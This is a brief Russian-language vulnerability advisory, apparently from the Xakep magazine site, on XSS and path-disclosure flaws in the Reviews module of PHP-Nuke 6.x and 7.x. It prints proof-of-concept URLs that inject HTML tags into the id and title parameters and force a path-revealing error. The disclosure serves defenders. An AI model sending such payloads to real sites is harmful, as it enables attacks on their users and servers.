Несколько уязвимостей в PHP-Nuke

Рекомендуем почитать:

Xakep #299. Sysmon

• Содержание выпуска
• Подписка на «Хакер»-60%

Программа: PHP-Nuke 6.x, 7.2, 7.3 

Несколько уязвимостей в проверке правильности входных данных обнаружено в PHP-Nuke в модуле Reviews. Удаленный пользователь может выполнить XSS нападение и определить инсталляционный путь. 

1. XSS: 

http://localhost/nuke1/modules.php?name= Reviews&rop=postcomment&id= '<h1>DarkBicho</h1&title =a
http://localhost/nuke1/modules.php?name= Reviews&rop=postcomment&id= '&title=<h1>DarkBicho</h1>

2. Раскрытие пути: 

http://localhost/nuke1/modules.php?name= Reviews&rop=showcontent&id='DarkBich